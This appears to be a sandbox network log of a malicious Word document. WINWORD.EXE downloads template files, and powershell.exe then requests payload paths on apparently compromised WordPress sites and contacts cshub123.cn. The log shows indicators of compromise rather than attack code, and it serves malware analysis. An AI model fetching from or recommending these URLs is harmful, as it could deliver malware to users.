X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 550906
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
ETag: 0x8D60DDC2BE7DF3C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a2e8f81c-101e-0034-3f97-a0b9e2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 640684
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
ETag: 0x8D60DDB5C4DB3A1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1065873
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
Last-Modified: Wed, 29 Aug 2018 18:15:36 GMT
ETag: 0x8D60DDB6B23796A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ff55c06c-c01e-0039-5b97-a078cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 222992
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
ETag: 0x8D60DDC26100537
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6340fd72-201e-0152-6397-a008cf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1881952
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC0007D57D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 380b83a1-d01e-0040-6a97-a01187000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1310275
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
ETag: 0x8D60DDBA6587FB6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f0118c-501e-0148-3a97-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2527736
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 953453
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 1OrACenntkuLABroK4EC+g==
Last-Modified: Thu, 12 Jul 2018 00:20:09 GMT
ETag: 0x8D5E78D3A5A7B12
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 999a087b-601e-0095-5897-a0595a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
DNS

162.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.62.23.in-addr.arpa

IN PTR

Response

162.61.62.23.in-addr.arpa

IN PTR

a23-62-61-162deploystaticakamaitechnologiescom
DNS

23.251.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.251.17.2.in-addr.arpa

IN PTR

Response

23.251.17.2.in-addr.arpa

IN PTR

a2-17-251-23deploystaticakamaitechnologiescom
DNS

viettellogistics.com.vn

powershell.exe

Remote address:

8.8.8.8:53

Request

viettellogistics.com.vn

IN A

Response

viettellogistics.com.vn

IN A

171.244.51.31
GET

https://viettellogistics.com.vn/wp-content/oS4/

powershell.exe

Remote address:

171.244.51.31:443

Request

GET /wp-content/oS4/ HTTP/1.1
Host: viettellogistics.com.vn
Connection: Keep-Alive

Response

HTTP/1.1 308 Permanent Redirect

date: Sat, 25 May 2024 09:04:20 GMT
transfer-encoding: chunked
location: /wp-content/oS4
refresh: 0;url=/wp-content/oS4
strict-transport-security: max-age=15724800; includeSubDomains
set-cookie: SERVERID=A; path=/
connection: close
DNS

31.51.244.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.51.244.171.in-addr.arpa

IN PTR

Response

31.51.244.171.in-addr.arpa

IN CNAME

31.0-24.51.244.171.in-addr.arpa
DNS

cococat.se

powershell.exe

Remote address:

8.8.8.8:53

Request

cococat.se

IN A

Response

cococat.se

IN A

185.189.51.191
GET

http://cococat.se/wp-admin/2Oaf/

powershell.exe

Remote address:

185.189.51.191:80

Request

GET /wp-admin/2Oaf/ HTTP/1.1
Host: cococat.se
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Sat, 25 May 2024 09:04:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/8.1.28
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Location: https://cococat.se
Vary: User-Agent
DNS

191.51.189.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

191.51.189.185.in-addr.arpa

IN PTR

Response

191.51.189.185.in-addr.arpa

IN PTR

ns12inleednet
DNS

andresirjan.ir

powershell.exe

Remote address:

8.8.8.8:53

Request

andresirjan.ir

IN A

Response

andresirjan.ir

IN A

89.42.208.212
GET

http://andresirjan.ir/wp-admin/JSH/

powershell.exe

Remote address:

89.42.208.212:80

Request

GET /wp-admin/JSH/ HTTP/1.1
Host: andresirjan.ir
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <http://andresirjan.ir/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
date: Sat, 25 May 2024 09:04:27 GMT
server: LiteSpeed
DNS

212.208.42.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.208.42.89.in-addr.arpa

IN PTR

Response

212.208.42.89.in-addr.arpa

IN PTR

cp58mihanme
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

sptrade.com.br

powershell.exe

Remote address:

8.8.8.8:53

Request

sptrade.com.br

IN A

Response

sptrade.com.br

IN A

185.239.210.245
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

245.210.239.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.210.239.185.in-addr.arpa

IN PTR

Response
DNS

91.90.14.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.90.14.23.in-addr.arpa

IN PTR

Response

91.90.14.23.in-addr.arpa

IN PTR

a23-14-90-91deploystaticakamaitechnologiescom
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 415458
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F42F1CE650554D8C94501DEDEC34B12D Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
date: Sat, 25 May 2024 09:05:39 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 792794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F392B688CE6447C8971DB92620A24C50 Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
date: Sat, 25 May 2024 09:05:39 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 627437
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8ECFE39FB26F46D5B4B505891276927C Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
date: Sat, 25 May 2024 09:05:39 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 430689
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A81C356F10194BE9836D100B07D79FB8 Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
date: Sat, 25 May 2024 09:05:39 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet

52.109.76.243:443

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

tls, http

WINWORD.EXE

1.7kB
7.7kB
11
10

HTTP Request

POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

HTTP Response

200
216.152.233.103:443

cshub123.cn

powershell.exe

260 B
5
204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

tls, http2

2.5kB
9.0kB
19
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

HTTP Response

204
23.62.61.194:443

https://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

tls, http2

1.5kB
5.4kB
17
12

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

HTTP Response

200
23.62.61.194:443

https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

tls, http2

1.6kB
6.3kB
17
12

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

HTTP Response

200
23.62.61.162:443

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

tls, http

WINWORD.EXE

1.2kB
5.9kB
8
8

HTTP Request

GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

tls, http

WINWORD.EXE

2.2kB
50.1kB
29
41

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

tls, http

WINWORD.EXE

25.4kB
754.1kB
398
545

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

tls, http

WINWORD.EXE

2.5kB
52.9kB
34
43

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

tls, http

WINWORD.EXE

2.8kB
39.7kB
33
34

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

tls, http

WINWORD.EXE

1.9kB
41.0kB
24
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

tls, http

WINWORD.EXE

2.6kB
37.8kB
31
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

tls, http

WINWORD.EXE

1.8kB
37.6kB
22
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

tls, http

WINWORD.EXE

2.4kB
37.4kB
30
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

tls, http

WINWORD.EXE

8.9kB
273.9kB
154
204

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

tls, http

WINWORD.EXE

2.4kB
37.6kB
30
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

tls, http

WINWORD.EXE

2.0kB
26.1kB
23
23

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

tls, http

WINWORD.EXE

2.6kB
38.9kB
32
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

tls, http

WINWORD.EXE

2.0kB
37.0kB
25
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

HTTP Response

200
2.17.251.23:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

tls, http

WINWORD.EXE

2.6kB
37.0kB
30
32

HTTP Request

